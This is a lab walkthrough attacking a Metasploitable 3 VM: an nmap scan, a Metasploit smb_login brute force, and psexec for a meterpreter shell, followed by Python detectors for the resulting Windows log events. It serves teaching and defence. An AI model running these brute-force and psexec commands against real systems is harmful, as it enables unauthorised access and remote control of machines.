Target: Metasploitable 3
Attacker: Kali Linux
Scan the target IP to find the open ports and the services running on them. I am using the nmap command to scan the target PC; nmap shows all available open ports and their services. Today this article will cover an SMB login attack, which requires an open SMB port. Type the following command on the terminal in Kali Linux:
nmap -p- -A 192.168.1.11
The previous article is about an SSH login attack; read it from here.
Luckily!!! In Metasploitable 3 port 445 is open for the SMB service, which is mainly used to provide shared access to files, printers, and serial ports and miscellaneous communication between server and client on a network.
Now it is necessary to create a dictionary file to exploit it. To make a dictionary file type the following command:
CeWL is a custom wordlist generator that sticks to just the site you have specified, goes to a depth of 2 links, and returns a list of words which can then be used with password crackers such as John the Ripper.
Start the Metasploit framework by typing msfconsole on the terminal in Kali Linux.
The smb_login module will test SMB logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database, this module will record successful logins and hosts so you can track your access.
Type the following commands under msfconsole:
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts 192.168.1.11
msf auxiliary(smb_login) > set rport 445
msf auxiliary(smb_login) > set smbuser vagrant
msf auxiliary(smb_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(smb_login) > set stop_on_success true
msf auxiliary(smb_login) > exploit
This module will start a brute force attack, trying each password from the dictionary until one authenticates, and prints a green [+] line when it finds the correct credential for SMB login. Because stop_on_success is set, it stops at the first hit.
Our attack is successful and we have got a valid login: vagrant:vagrant as username and password.
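From the defender's side, the smb_login run above leaves a very recognisable trace on the target: a burst of failed network logons (Windows Security event 4625, logon type 3) from one source address, followed, when stop_on_success fires, by a single successful logon (4624) from the same address. The following Python is an added example written for this article, not part of the original post or of Metasploit; it assumes the events have already been exported as dictionaries with the listed field names, and the sample events it builds are constructed to mimic the run above.

```python
"""Flag SMB password guessing in Windows Security logon events.

Added example for this article (not Metasploit code). It assumes events
exported as dicts carrying ts (datetime), EventID, IpAddress,
TargetUserName and LogonType; the sample data below is constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _event(ts, event_id, ip, user, logon_type=3):
    # Only the fields the detector needs; real 4624/4625 records carry more.
    return {"ts": ts, "EventID": event_id, "IpAddress": ip,
            "TargetUserName": user, "LogonType": logon_type}


def build_sample_events():
    """Constructed sample log: eight failed network logons for 'vagrant'
    from one source, then a success from the same source (the
    stop_on_success pattern), plus an unrelated single failure from
    another host and an interactive (LogonType 2) failure that an SMB
    rule must ignore."""
    base = datetime(2024, 1, 1, 10, 0, 0)
    events = []
    for i in range(8):
        events.append(_event(base + timedelta(seconds=i), 4625,
                             "192.168.1.10", "vagrant"))
    events.append(_event(base + timedelta(seconds=8), 4624,
                         "192.168.1.10", "vagrant"))
    events.append(_event(base + timedelta(minutes=1), 4625,
                         "192.168.1.20", "alice"))
    events.append(_event(base + timedelta(minutes=2), 4625,
                         "-", "bob", logon_type=2))
    return events


def detect_smb_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Return one alert per source IP that produced at least `threshold`
    failed network logons (4625, LogonType 3) inside `window`, and note
    whether a 4624 from the same IP followed the last failure of that
    burst, i.e. whether the guessing most likely succeeded."""
    by_ip = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["LogonType"] == 3:          # network logons only (SMB, RPC, ...)
            by_ip[ev["IpAddress"]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e["EventID"] == 4625]
        for i, first in enumerate(failures):
            # Sliding window starting at each failure.
            burst = [f for f in failures[i:] if f["ts"] - first["ts"] <= window]
            if len(burst) < threshold:
                continue
            last_fail = burst[-1]["ts"]
            followed_by_success = any(
                e["EventID"] == 4624 and last_fail <= e["ts"] <= last_fail + window
                for e in evs)
            alerts.append({
                "source_ip": ip,
                "failed_attempts": len(burst),
                "users_tried": sorted({f["TargetUserName"] for f in burst}),
                "first_failure": first["ts"].isoformat(),
                "followed_by_success": followed_by_success,
            })
            break  # one alert per source; don't re-report sub-windows
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(build_sample_events()):
        print(alert)
```

The threshold and window are tunable; what matters is the "failures then success from the same address" shape, which a single mistyped password never produces. On a real domain the same logic applies to the domain controller's Security log, where SMB authentications from every workstation land.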
The psexec module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. It is similar to the "psexec" utility provided by SysInternals. The module is now able to clean up after itself; the service created by this tool uses a randomly chosen name and description.
Hence, using the credentials found above, this exploit will try to provide a meterpreter shell. Type the following commands to use this module for the attack:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhosts 192.168.1.11
msf exploit(psexec) > set rport 445
msf exploit(psexec) > set smbuser vagrant
msf exploit(psexec) > set smbpass vagrant
msf exploit(psexec) > exploit
Wonderful!!! Our meterpreter session 1 is opened and you have got the victim's shell.
meterpreter > sysinfo
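The article notes that the psexec module installs a service with a randomly chosen name. On the target that shows up as a System log event 7045 ("A service was installed in the system") whose service name, and often binary name, looks nothing like a product name. The Python below is an added example for this article, not code from the original post or from Metasploit; it assumes 7045 records exported as dictionaries with ServiceName, ImagePath and AccountName fields, the sample records are constructed, and the randomness test is a heuristic (letters only, mixed case, high entropy, few vowels) that should be paired with an allow-list of services known in your environment.

```python
"""Flag psexec-style remote service installs from System event 7045 records.

Added example for this article (not Metasploit code). Records are assumed
to be dicts with ServiceName, ImagePath and AccountName; the sample
records and the service/binary names in them are constructed.
"""
import math
import re
from collections import Counter

LETTERS_ONLY = re.compile(r"^[A-Za-z]+$")

# Constructed sample 7045 records: one random-looking install (the shape the
# article describes), one built-in service, one third-party agent.
SAMPLE_7045 = [
    {"ServiceName": "WNdWqJJRxxxIlhey",
     "ImagePath": "%SYSTEMROOT%\\bQLCxYKM.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "WaaSMedicSvc",
     "ImagePath": "C:\\Windows\\System32\\svchost.exe -k WaaSMedicSvc",
     "AccountName": "LocalSystem"},
    {"ServiceName": "VendorBackupAgent",
     "ImagePath": '"C:\\Program Files\\Vendor\\agent.exe" --svc',
     "AccountName": "LocalSystem"},
]


def shannon_entropy(s):
    """Bits of entropy per character of `s`."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(name, min_len=8, min_entropy=2.8, max_vowel_ratio=0.25):
    """Heuristic for machine-generated names: letters only, reasonably long,
    mixed case, high entropy and few vowels. Human-chosen and CamelCase
    product names keep a vowel ratio close to natural language (~0.35+)."""
    if len(name) < min_len or not LETTERS_ONLY.match(name):
        return False
    if name.islower() or name.isupper():
        return False
    vowels = sum(ch in "aeiouAEIOU" for ch in name)
    return (shannon_entropy(name) >= min_entropy
            and vowels / len(name) <= max_vowel_ratio)


def image_basename(image_path):
    """Executable name without extension from a service ImagePath,
    handling quoted paths with arguments and unquoted ones."""
    p = image_path.strip()
    if p.startswith('"'):
        p = p[1:].split('"', 1)[0]
    else:
        p = p.split(" ", 1)[0]
    base = re.split(r"[\\/]", p)[-1]
    return re.sub(r"\.[A-Za-z0-9]+$", "", base)


def detect_suspicious_service_installs(records, allowlist=frozenset()):
    """Return an alert for each 7045 record whose service name or binary
    name looks random, unless the service name is explicitly allowed."""
    alerts = []
    for r in records:
        if r["ServiceName"] in allowlist:
            continue
        reasons = []
        if looks_random(r["ServiceName"]):
            reasons.append("random-looking service name")
        if looks_random(image_basename(r["ImagePath"])):
            reasons.append("random-looking binary name")
        if reasons:
            alerts.append({"service": r["ServiceName"],
                           "image": r["ImagePath"],
                           "account": r["AccountName"],
                           "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_suspicious_service_installs(SAMPLE_7045):
        print(alert)
```

Correlating a flagged 7045 with a 4624 type-3 logon for the same account a few seconds earlier (the previous example's data) turns two weak signals into a strong one: a remote authentication immediately followed by a throwaway service is the lateral-movement pattern this module relies on, whichever tool produced it.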